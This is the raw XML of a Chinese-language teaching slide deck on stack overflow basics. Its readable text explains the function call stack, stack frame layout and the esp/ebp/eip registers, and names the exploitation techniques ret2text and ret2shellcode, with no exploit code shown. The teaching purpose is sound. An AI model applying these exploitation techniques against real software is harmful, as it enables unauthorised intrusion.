              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF3B19CA-C801-468F-B577-E5237DA13117}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5080337" y="971286"/>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两种汇编格式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAE4A910-F332-40BC-9B7F-B077C4B7848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83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2DA9E7-F3F0-450B-B6C1-AB548372BBC9}"/>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2</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栈溢出基础</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0A9DF66-10FF-420B-91B3-2B7CCBCAB118}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589811" y="3049184"/>
            <a:ext cx="7730836"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t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>语言函数调用栈</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ret2text</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ret2shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="396195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7C11A0F-4A40-400B-9DC4-E669E438E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637" y="4893307"/>
            <a:ext cx="3009363" cy="1964693"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98AEB040-472E-45B8-B07E-B8CC64CBBEE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="2307771"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9423184-07F3-4070-A230-1A2EA62E6F92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477229" y="2588653"/>
            <a:ext cx="5705408"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破解、利用成功（程序的二进制漏洞）</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攻破（设备、服务器）</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控制（设备、服务器）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159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图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D491AA73-6C9F-41E1-A9CA-BAD9AB5CD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183" y="1632769"/>
            <a:ext cx="6858000" cy="4152900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6875684-F35E-4A07-9595-7E0A2B6174F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534943" y="1629549"/>
            <a:ext cx="4011299" cy="397031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函数调用栈是指程序运行时内存一段连续的区域</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用来保存函数运行时的状态信息，包括函数参数与局部变量等</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称之为“栈”是因为发生函数调用时，调用函数（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）的状态被保存在栈内，被调用函数（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）的状态被压入调用栈的栈顶</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在函数调用结束时，栈顶的函数（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）状态被弹出，栈顶恢复到调用函数（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函数调用栈在内存中从高地址向低地址生长，所以栈顶对应的内存地址在压栈时变小，退栈时变大</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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3D031153-67BB-46A4-9E6D-D0CCB11A21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15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hape 619">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{882F2EF2-FA22-4B45-91DD-8939C13C313B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="31" idx="3"/>
            <a:endCxn id="28" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5265016" y="2349789"/>
            <a:ext cx="12700" cy="1294899"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1800000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="980000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Shape 622">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08A6371B-83C1-4E1A-AD6A-3AB5F953C370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6096000" y="1867020"/>
            <a:ext cx="5041894" cy="4168152"/>
            <a:chOff x="5524975" y="1183600"/>
            <a:chExt cx="3036475" cy="3551150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Shape 623">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D70729A3-CB7B-4815-B509-C1B7F22E6356}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5524975" y="1596175"/>
              <a:ext cx="238200" cy="274200"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 8333"/>
                <a:gd name="adj2" fmla="val 50000"/>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 name="Shape 624">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9474056B-F607-4267-9B7F-409725167A47}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5792750" y="1183600"/>
              <a:ext cx="2768700" cy="3551150"/>
              <a:chOff x="4897550" y="1085100"/>
              <a:chExt cx="2768700" cy="3551150"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EC097F4-B8DB-4720-8DCB-699B3683A01D}"/>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C33F9C2F-0E82-4BBF-A976-B252A4F4E6B9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1486975"/>
                <a:ext cx="1363200" cy="28109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8" name="Shape 627">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C4DDA1C-BAAD-4874-9E6F-FA12D12C553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9D5E3B76-3F1B-4175-84D3-A144101D1C9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DB1D11A9-52EF-40AF-9A40-276A113D8331}"/>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4AD4C1CF-9580-4F46-B4E8-C250B4D1C3FF}"/>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12" name="Shape 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56FD7174-0F20-4CD4-A488-EFB8DC03B573}"/>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4897EBFA-5D09-43A5-AF46-ED08A85DF867}"/>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14" name="Shape 633">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E035F1E-FFA2-4EB8-89D7-B3485CD7DDA3}"/>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A5A19862-8302-4D12-8091-29AEF34B9841}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:stCxn id="8"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7BC2F7D-F2F1-415B-B3E6-8BB3C5F20833}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:stCxn id="11"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7" name="Shape 636">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{362352FB-4C36-4C1D-AC9D-0769DD936331}"/>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18" name="Shape 637">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46E79958-92A6-475E-99D7-46BBFEB17F57}"/>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0xC0000000</a:t>
                </a:r>
                <a:endParaRPr sz="1000">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="19" name="Shape 638">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEC41C93-783F-495C-8AA9-C85F673B7FA1}"/>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0" name="Shape 639">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{148B6067-575D-4250-9964-8189ACD8C21C}"/>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1" name="Shape 640">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C259D00C-3D94-449D-839B-5C6A8EA0329F}"/>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641">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7856FE6-9830-4289-A290-D96D0D367EF8}"/>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3" name="Shape 642">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A08A36B3-6B3F-4DF3-A6BA-36578B224A03}"/>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4" name="Shape 643">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B42A998-DF6E-40B1-8094-91650E959A65}"/>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5" name="Shape 644">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9E54597-204A-4893-8767-41B285255A4E}"/>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6" name="Shape 645">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A5A299C-3DFC-425A-87A3-2C988083A45C}"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Shape 646">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52C8EFC1-AADF-4D52-A09B-1EAE6F2088A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="723948" y="2191435"/>
            <a:ext cx="5372052" cy="3210393"/>
            <a:chOff x="713400" y="1474025"/>
            <a:chExt cx="4283825" cy="2779500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Shape 621">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D61A8D17-35FC-4508-B15B-810E4460C5F2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="14740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previous stack frame pointer</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Shape 647">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22F69E3D-54E1-46B0-912F-3528263EC322}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="1748225"/>
              <a:ext cx="2537400" cy="5727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arguments</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>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return address</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Shape 620">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B4C9F3D-FBDA-4376-97B2-D7EFD3888AB8}"/>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2" name="Shape 649">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{414C51AD-75B3-41CF-A736-4110D8AB7C08}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="2869325"/>
              <a:ext cx="25374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callee saved registers</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3143525"/>
              <a:ext cx="2537400" cy="49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639725"/>
              <a:ext cx="2537400" cy="49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5" name="Shape 652">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2D93492-FC23-451B-A51F-519052654052}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="713400" y="3979325"/>
              <a:ext cx="1083775" cy="274200"/>
              <a:chOff x="4332275" y="4555900"/>
              <a:chExt cx="1083775" cy="274200"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Shape 653">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{097497BB-187F-4437-8232-CC5C8405C946}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4332275" y="4555900"/>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%esp</a:t>
                </a:r>
                <a:endParaRPr sz="1000" dirty="0">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="40" name="Shape 654">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23767186-FF7B-4605-A935-90B30057F43C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="10800000" flipH="1">
                <a:off x="4931250" y="47191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6" name="Shape 655">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2849CC3A-BF7D-4F1A-86D0-F40F04A22A43}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="713400" y="2732225"/>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%ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="37" name="Shape 656">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB22DC12-6E1A-444C-80C0-33A299E8E3CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="1312375" y="2865875"/>
              <a:ext cx="484800" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Shape 657">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F30028AE-AC57-46D1-815F-C5D106291539}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4355825" y="1482900"/>
              <a:ext cx="641400" cy="2652900"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 8333"/>
                <a:gd name="adj2" fmla="val 10163"/>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4678169" y="1238535"/>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栈帧结构概览</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="矩形 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A0DC31B-8040-4BD5-94DF-D377F36049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192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68FC96DA-737D-438D-8CF8-2C40F33E9360}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652529" y="1311499"/>
            <a:ext cx="6096000" cy="5078313"/>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函数状态主要涉及三个寄存器 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>—— </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用来存储函数调用栈的栈顶地址，在压栈和退栈时发生变化。</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用来存储当前函数状态的基地址，在函数运行时不变，可以用来索引确定函数参数或局部变量的位置。</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用来存储即将执行的程序指令的地址，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cpu</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依照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的存储内容读取指令并执行，</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随之指向相邻的下一条指令，如此反复，程序就得以连续执行指令。</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下面让我们来看看发生函数调用时，栈顶函数状态以及上述寄存器的变化。变化的核心任务是将调用函数（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）的状态保存起来，同时创建被调用函数（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）的参数按照逆序依次压入栈内。如果被调用函数（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）不需要参数，则没有这一步骤。这些参数仍会保存在调用函数（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）的函数状态内，之后压入栈内的数据都会作为被调用函数（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）的函数状态来保存。</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7565B4F1-8D77-4EDE-9195-2A3CC162D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442" y="1311499"/>
            <a:ext cx="4677428" cy="3848637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6684A278-462C-4A95-93A8-FE7EA214BAF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8035412" y="5177169"/>
            <a:ext cx="3185487"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将被调用函数的参数压入栈内</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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237E7BE6-FDFF-4CDA-AABD-AE2CEA8F9959}"/>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992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矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01F21D3C-9F5D-47B3-93F0-1EF18E038016}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431912" y="282883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）进行调用之后的下一条指令地址作为返回地址压入栈内。这样调用函数（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（指令）信息得以保存。</a:t>
            </a:r>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BFA4BF80-115D-40CD-B3D9-35F214B5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89" y="1333207"/>
            <a:ext cx="4648849" cy="4191585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EB173F8-13F3-4815-A6EF-9419AF434AAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7837937" y="5524792"/>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DE544343-CD9E-41EC-9759-A05A653B8DC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837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2C49A3C1-9D59-4E76-8C59-9E4B374B3FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196641" y="2677251"/>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再将当前的</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寄存器的值（也就是调用函数的基地址）压入栈内，并将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寄存器的值更新为当前栈顶的地址。这样调用函数（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（基地址）信息得以保存。同时，</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被更新为被调用函数（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p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAAA5965-1568-4BF2-9444-D655D6C49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531" y="853673"/>
            <a:ext cx="4654401" cy="4676425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ACD245E-A344-49AC-AB07-0D84C105C4CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7173530" y="5530098"/>
            <a:ext cx="4654401"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将调用函数的基地址（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">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）压入栈内，并将当前栈顶地址传到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ebp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B450286E-2AE4-471C-AC49-AAEF6B5C30B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14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E30619AA-F164-4FAE-819F-8D4F084C049C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431912" y="2880377"/>
            <a:ext cx="6096000" cy="646331"/>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再之后是将被调用函数（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）的局部变量等数据压入栈内。</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1EABE21-65EC-489F-B225-E707B2631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665" y="763450"/>
            <a:ext cx="4280091" cy="4880186"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ABBEAF0-EE77-4681-97E4-B7A8BE94D710}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7938134" y="5709043"/>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6438E6D-AB74-45E4-925F-492337B72CE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331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01288C6B-31B6-4828-815F-3758AE90730A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523741" y="1746391"/>
